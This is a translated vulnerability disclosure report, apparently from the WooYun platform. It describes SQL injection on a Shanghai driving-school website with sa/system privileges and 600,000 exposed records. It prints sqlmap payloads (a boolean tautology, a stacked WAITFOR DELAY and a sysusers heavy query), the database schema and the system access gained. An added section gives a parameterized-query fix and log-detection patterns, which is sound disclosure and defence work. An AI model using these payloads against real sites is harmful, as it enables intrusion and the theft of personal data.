
Vulnerability summary

Defect ID: wooyun-2015-0148081

Title: SQL injection on a driving-school website (SA privileges on the server) exposing important information of 600,000 users (name, phone, ID card number, address, etc.)

Vendor: a driving school

Author: 路人甲

Submitted: 2015-10-20 16:34

Fix time: 2015-12-07 17:16

Published: 2015-12-07 17:16

Type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-20: Details notified to the vendor, awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and experts in the relevant field
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public

Brief description:

SQL injection on a driving-school website (SA privileges, server taken over) leaking 600,000 records (name, phone, ID card number, address, etc.)

Detailed description:

SQL injection on a Shanghai driving-school website with SA privileges (the server has already been compromised), leaking 600,000 important records (name, phone, ID card number, address, etc.).
The privilege level is nt authority\system; the server has been taken over and important information is exposed.
Link: http://**.**.**.**/jgxx2.asp?id=9

sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 6839=6839
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=9; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=9 AND 8384=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
[15:38:52] [INFO] testing Microsoft SQL Server
[15:38:53] [INFO] confirming Microsoft SQL Server
[15:38:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [18]:
[*] DTA
[*] ExamWeb
[*] ExamWebTest
[*] hpk
[*] hpk20130122
[*] HPK20130515
[*] hpk20130827
[*] hpk20150803
[*] hpksh
[*] jx
[*] master
[*] model
[*] msdb
[*] QPS
[*] RCMDVRServer
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
current user: 'sa'
current database: 'jx'
Database: jx
[110 tables]
+----------------------------+
| 091123 |
| 2010061 |
| 2014coach |
| BusinessUsers |
| COACH |
| COACH_BAD_RECORD |
| COACH_BAD_RECORD_2009 |
| COACH_BAD_RECORD_2010 |
| COACH_BAD_RECORD_ITEM |
| COACH_BAD_RECORD_ITEM_2010 |
| COACH_BOARD |
| COACH_BOARD_2013 |
| COACH_CHANGE |
| COACH_CHANGE_his |
| COACH_RE_EDUCATE |
| COACH_temp2013 |
| COACH_temp2014 |
| CoachRe |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| ExamQuestion |
| JXRead |
| PriceBase |
| S3_Tmp |
| SubjectType |
| TRAIN_UNIT_xh |
| VIEW_091123 |
| VIEW_2006 |
| VIEW_2007 |
| VIEW_2008 |
| VIEW_2009 |
| VIEW_2010 |
| VIEW_2011 |
| VIEW_2012 |
| VIEW_2013 |
| View_2014 |
| WZRY2014 |
| YZ_COACH_HONESTY |
| YZ_COACH_HONESTY_2009 |
| YZ_COACH_HONESTY_2010 |
| YZ_HONESTY_KIND |
| YZ_HONESTY_KIND_2009 |
| YZ_TRAIN_UNIT |
| YZ_TRAIN_UNIT22 |
| ZZ_SATISFY |
| ZZ_SATISFY_detail |
| ZZ_suggest |
| YZ_HONESTY_KIND_20 0 |
| ZZ_suggest_te`p |
| \x10bo.20140504coach |
| hpknew.????????????-??
| hpknew.????????????-??
| hpknew.????????????--??
| hpknew.????????????-??
| jxre`dtmp |
| _zhaoxy |
| _zhaoxy_dir |
| coach2009 |
| coach2010 |
| coach2012 |
| coach20120605 |
| coach2013 |
| coach20131017 |
| coach2014 |
| coach2015 |
| coach_2012 |
| coach_2013 |
| coach_2014 |
| coach_bad_record_2011 |
| coach_board_2014 |
| coach_board_2015 |
| coach_imp_temp |
| coach_level |
| coach_level_2008 |
| coach_level_2009 |
| coach_level_2010 |
| coach_level_2011 |
| coach_level_temp |
| coach_show |
| coach_show_his |
| dtprnperties |
| foofoofoo |
| jxpwd |
| jxpwd2 |
| pangolin_test_tabl@ |
| price_private |
| price_public |
| pupil_dc1 |
| pupil_fk |
| sqlmapoutput |
| t_jiaozhu |
| tb_sign_up |
| tb_user |
| tb_wenda |
| tb_zcfg |
| train_unit |
| train_unit22 |
| train_unit_2010 |
| train_unit_honespy |
| tszx_tab |
| veficle |
| vehicle201312 |
| vehicle_typ@ |
| yz_coach_honesty_2011 |
| zzPtrain_unit_temp |
| hpknew.coach2011 |
| hpknew.coach2011temp |
| hpknew.coach2011temp1 |
| hpknew.coachre2010 |
+----------------------------+


[Screenshots 2.png, 3.png, 4.png, 5.png and 6.png omitted]


Proof of vulnerability:

Database: jx
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.YZ_COACH_HONESTY | 648180 |
| dbo.yz_coach_honesty_2011 | 543960 |
| dbo.YZ_COACH_HONESTY_2010 | 472729 |
| dbo.YZ_COACH_HONESTY_2009 | 328363 |
| dbo.COACH_BOARD | 165593 |
| dbo.coach_board_2015 | 150608 |
| dbo.COACH_RE_EDUCATE | 145770 |
| dbo.coach_board_2014 | 116794 |
| dbo.COACH_BOARD_2013 | 89046 |
| dbo.coach_level | 79560 |
| dbo.coach_level_2011 | 57980 |
| dbo.coach_level_2010 | 39848 |
| dbo.CoachRe | 25813 |
| dbo.COACH | 25377 |
| dbo.coach_imp_temp | 25377 |
| dbo.coach_2014 | 24513 |
| dbo.COACH_temp2014 | 24513 |
| dbo.coach_level_2009 | 24033 |
| dbo.View_2014 | 23951 |
| dbo.coach2014 | 23688 |
| dbo.coach2015 | 23688 |
| dbo.VIEW_2012 | 22976 |
| dbo.VIEW_2013 | 22721 |
| dbo.coach2013 | 21852 |
| dbo.coach_level_temp | 21580 |
| dbo.coach2012 | 21306 |
| dbo.coach_2012 | 20725 |
| dbo.coach_2013 | 20592 |
| hpknew.coachre2010 | 19498 |
| dbo.VIEW_2011 | 18787 |
| hpknew.coach2011temp1 | 18504 |
| hpknew.coach2011 | 18365 |
| hpknew.coach2011temp | 18357 |
| dbo.coach20120605 | 18132 |
| dbo.coach2010 | 16438 |
| dbo.VIEW_2010 | 15979 |
| dbo.vehicle201312 | 15294 |
| dbo.coach2009 | 14937 |
| dbo.VIEW_2008 | 14843 |
| dbo.VIEW_2006 | 14841 |
| dbo.VIEW_2007 | 14839 |
| dbo.VIEW_091123 | 14837 |
| dbo.VIEW_2009 | 14837 |
| dbo.ZZ_suggest | 9694 |
| dbo.coach20131017 | 9615 |
| dbo.coach_level_2008 | 9249 |
| dbo.coach_bad_record_2011 | 2884 |
| dbo.COACH_BAD_RECORD_2009 | 2673 |
| dbo.COACH_BAD_RECORD_2010 | 2536 |
| dbo.COACH_BAD_RECORD | 2225 |
| dbo.ZZ_SATISFY_detail | 1445 |
| dbo.ExamQuestion | 1386 |
| dbo.pupil_dc1 | 1185 |
| dbo.tb_sign_up | 1144 |
| dbo.tszx_tab | 747 |
| dbo.COACH_CHANGE_his | 746 |
| dbo.PriceBase | 598 |
| dbo.WZRY2014 | 590 |
| dbo.ZZ_SATISFY | 411 |
| dbo.coach_show_his | 390 |
| dbo.COACH_CHANGE | 332 |
| dbo.coach_show | 243 |
| dbo.YZ_TRAIN_UNIT | 225 |
| dbo.train_unit22 | 220 |
| dbo.TRAIN_UNIT_xh | 220 |
| dbo.jxpwd | 219 |
| dbo.train_unit | 219 |
| dbo.YZ_TRAIN_UNIT22 | 218 |
| dbo.BusinessUsers | 210 |
| dbo.train_unit_2010 | 190 |
+--------------------------------+---------+
Database: jx
Table: YZ_COACH_HONESTY
[19 columns]
+---------------------------+------------------+
| Column | Type |
+---------------------------+------------------+
| COACH_NO | varchar |
| COACH_NO_NEW | varchar |
| H_MONTH | varchar |
| H_SCORE | float |
| H_YEAR | varchar |
| HID | int |
| HONESTY_COME_FROM | varchar |
| HONESTY_KIND | varchar |
| HONESTY_PERCENT | float |
| HONESTY_SUB_KIND_NAME | varchar |
| HONESTY_SUB_KIND_STANDARD | varchar |
| id_card | varchar |
| IS_SWAP | int |
| MEMO | varchar |
| NAME | varchar |
| SUBMIT_DATE | datetime |
| TRAIN_UNIT_CODE | varchar |
| YZ_COACH_HONESTY_ID | uniqueidentifier |
| YZ_HONESTY_KIND_ID | varchar |
+---------------------------+------------------+
Name, score, age, coach number, name, ID card number
Sensitive data leaked, including: name, phone, ID card number, address, etc.
ID card number, name, phone and address
nt authority\system
   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::cdeb:4df4:5c8b:8a01%14
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**
   本地链接 IPv6 地址. . . . . . . . : fe80::4961:92c2:6b16:b66f%13
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**10
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**

[Screenshots 78.png, 7.png, 8.png, 9.png and 88.png omitted]


Fix:

You know what to do.
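A worked version of the fix the report leaves unstated, added here as an example; it is not part of the original report and not the site's own code. It uses sqlite3 as a stand-in for the SQL Server back end, the `jgxx` table and its columns are assumptions, and the IIS log lines are constructed. The unsafe lookup reproduces the boolean-based blind oracle sqlmap reported for `jgxx2.asp?id=9` (a true tautology still returns the row, a false one returns nothing), the safe lookup validates and binds the parameter so the same input is rejected before it reaches the database, and `scan_iis_log` flags requests carrying the three payload shapes listed in the sqlmap output above (boolean tautology, stacked `WAITFOR DELAY`, heavy `sysusers` join).

```python
import re
import sqlite3
from urllib.parse import unquote

# Stand-in schema for the site's database (sqlite3 in place of SQL Server 2008;
# the table and column names are assumptions, not taken from the report).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jgxx (id INTEGER PRIMARY KEY, name TEXT, phone TEXT)")
    conn.executemany("INSERT INTO jgxx VALUES (?, ?, ?)",
                     [(9, "coach-9", "000-0000"), (10, "coach-10", "000-0001")])
    return conn

def lookup_unsafe(conn, raw_id):
    # Vulnerable pattern: the GET parameter is pasted into the statement, so the
    # WHERE clause is whatever the client sends. "9 AND 6839=6839" still returns
    # the row while "9 AND 6839=6840" returns nothing; that difference is the
    # boolean-based blind oracle sqlmap reported against jgxx2.asp?id=9.
    sql = "SELECT name, phone FROM jgxx WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, raw_id):
    # Hardened version: validate the type first, then bind the value as a query
    # parameter so it is never parsed as SQL. A tautology or a stacked
    # ";WAITFOR DELAY" suffix is now just a malformed integer and is rejected.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT name, phone FROM jgxx WHERE id=?",
                        (int(raw_id),)).fetchall()

# Detection side: one pattern per technique in the report's sqlmap output.
SIGNATURES = [
    (r"\band\s+\d+\s*=\s*\d+\b", "boolean-based blind tautology"),
    (r"\bwaitfor\s+delay\b", "MSSQL stacked-query / time-based probe"),
    (r"\bsysusers\b", "heavy-query time-based probe"),
]

def scan_iis_log(lines):
    # Expects W3C fields: date time s-ip method uri-stem uri-query port user c-ip ua status.
    # Returns one record per flagged request. The query string is URL-decoded
    # before matching because the payload arrives percent-encoded.
    flagged = []
    for line in lines:
        if line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 10:
            continue
        query, client_ip = unquote(fields[5]), fields[8]
        labels = [label for pat, label in SIGNATURES
                  if re.search(pat, query, re.IGNORECASE)]
        if labels:
            flagged.append({"ip": client_ip, "path": fields[4],
                            "query": query, "labels": labels})
    return flagged

# Constructed sample log (not from the report); server and client IPs are made up.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2015-10-20 15:38:50 10.0.0.5 GET /jgxx2.asp id=9 80 - 203.0.113.7 Mozilla/5.0 200",
    "2015-10-20 15:38:52 10.0.0.5 GET /jgxx2.asp id=9%20AND%206839=6839 80 - 203.0.113.7 Mozilla/5.0 200",
    "2015-10-20 15:38:53 10.0.0.5 GET /jgxx2.asp id=9;%20WAITFOR%20DELAY%20'0:0:5'-- 80 - 203.0.113.7 Mozilla/5.0 200",
    "2015-10-20 15:38:54 10.0.0.5 GET /jgxx2.asp id=9%20AND%208384=(SELECT%20COUNT(*)%20FROM%20sysusers%20AS%20sys1) 80 - 203.0.113.7 Mozilla/5.0 200",
    "2015-10-20 15:39:00 10.0.0.5 GET /jgxx2.asp id=10 80 - 198.51.100.2 Mozilla/5.0 200",
]

if __name__ == "__main__":
    db = make_db()
    print(lookup_unsafe(db, "9 AND 6839=6839"), lookup_unsafe(db, "9 AND 6839=6840"))
    try:
        lookup_safe(db, "9 AND 6839=6839")
    except ValueError as exc:
        print("rejected:", exc)
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["labels"])
```

The two findings in the report map to two controls: parameter binding removes the injection itself, and running the application under a low-privileged database login instead of `sa` removes the path from an injection to `nt authority\system` on the host, which is what turned this from a data leak into a server compromise.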

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-23 17:15

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Shanghai branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-10-20 16:35 | HackPanda ( Regular white hat | Rank:117 Vulnerabilities:16 | Talk is cheap,show me the shell.)

    Is it the "generic" driving-school one?

  2. 2015-10-20 16:36 | HackPanda ( Regular white hat | Rank:117 Vulnerabilities:16 | Talk is cheap,show me the shell.)

    Oh, it isn't - - the one you reported isn't the generic one..